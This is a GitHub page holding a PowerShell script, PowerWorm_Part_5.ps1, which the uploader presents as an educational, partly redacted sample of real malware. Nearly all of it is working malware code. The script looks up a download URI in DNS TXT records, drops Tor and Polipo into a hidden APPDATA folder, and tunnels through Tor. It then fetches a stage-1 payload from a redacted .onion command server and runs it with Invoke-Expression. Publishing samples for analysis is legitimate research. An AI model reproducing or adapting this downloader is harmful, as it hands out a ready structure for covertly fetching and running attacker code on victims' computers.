-
Notifications
You must be signed in to change notification settings - Fork 42
/
Copy pathPowerWorm_Part_5.ps1
100 lines (82 loc) · 6.5 KB
/
PowerWorm_Part_5.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
<#
TERMS OF USE: Considering I am not the original author of this malware, I
cannot apply any formal license to this work. I can, however, apply a
gentleman's clause to the use of this script which is dictated as follows:
DBAD Clause v0.1
----------------
Don't be a douche. This malware has little to no legitimate use and as such, I
reserve the right to publicly shame you if you are caught using this for
malicious purposes. The sole purpose of publishing this malware is to inform
and educate.
Lastly, I have redacted portions of the malware where necessary. Redactions
will be evident in the code.
#>
<#
This payload is identical to that of PowerWorm_Part1.ps1. The only difference
will be the GUID in the 'mom' C2 URI parameter.
#>
# Ignore all errors
$ErrorActionPreference = 'SilentlyContinue'
# The machine GUID is used throughout Power Worm
$MachineGuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
# If the payload is already persisted in the registry, kill
if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run) -match $MachineGuid)
{
Get-Process -Id $PID | Stop-Process
}
# This function retrieves a URI from a DNS TXT record, downloads a zip file, and extracts it
function Get-DnsTXTRecord($DnsHost)
{
$ZipFileUri = (((Invoke-Expression "nslookup -querytype=txt $DnsHost 8.8.8.8") -match '"') -replace '"', '')[0].Trim()
$WebClient.DownloadFile($ZipFileUri, $ZipPath)
$Destination = $Shell.NameSpace($ZipPath).Items();
# Decompress files
$Shell.NameSpace($ToolsPath).CopyHere($Destination, 20)
Remove-Item $ZipPath
}
$ToolsPath = Join-Path $Env:APPDATA $MachineGuid
# Mark the path where tools are extracted as 'Hidden', 'System', 'NotContentIndexed'
if (!(Test-Path $ToolsPath))
{
$Directory = New-Item -ItemType Directory -Force -Path $ToolsPath
$Directory.Attributes = 'Hidden', 'System', 'NotContentIndexed'
}
$Tor = Join-Path $ToolsPath 'tor.exe'
$Polipo = Join-Path $ToolsPath 'polipo.exe'
$ZipPath = Join-Path $ToolsPath ($MachineGuid + '.zip')
$WebClient = New-Object Net.WebClient
$Shell = New-Object -ComObject Shell.Application
if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
Get-DnsTXTRecord 'REDACTEDREDACTED.de'
}
if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
Get-DnsTXTRecord 'REDACTEDREDACTED.cc'
}
$TorRoamingLog = Join-Path $ToolsPath 'roaminglog'
# Start Tor and maintain an initialization log file
Start-Process $Tor -ArgumentList " --Log `"notice file $TorRoamingLog`"" -WindowStyle Hidden
# Wait for Tor to finish initializing
do
{
Start-Sleep 1
$LogContents = Get-Content $TorRoamingLog
}
while (!($LogContents -match 'Bootstrapped 100%: Done.'))
# Start polipo proxy
Start-Process $Polipo -ArgumentList 'socksParentProxy=localhost:9050' -WindowStyle Hidden
Start-Sleep 7
$WebProxy = New-Object Net.WebProxy('localhost:8123')
$WebProxy.UseDefaultCredentials = $True
$WebClient.Proxy = $WebProxy
$Stage1Uri = 'http://REDACTEDREDACTED.onion/get.php?s=setup&mom=REDACTEDREDACTED&uid=' + $MachineGuid
while (!$Stage1Payload)
{
$Stage1Payload=$WebClient.downloadString($Stage1Uri)
}
if ($Stage1Payload -ne 'none')
{
# Execute the stage 1 payload
Invoke-Expression $Stage1Payload
}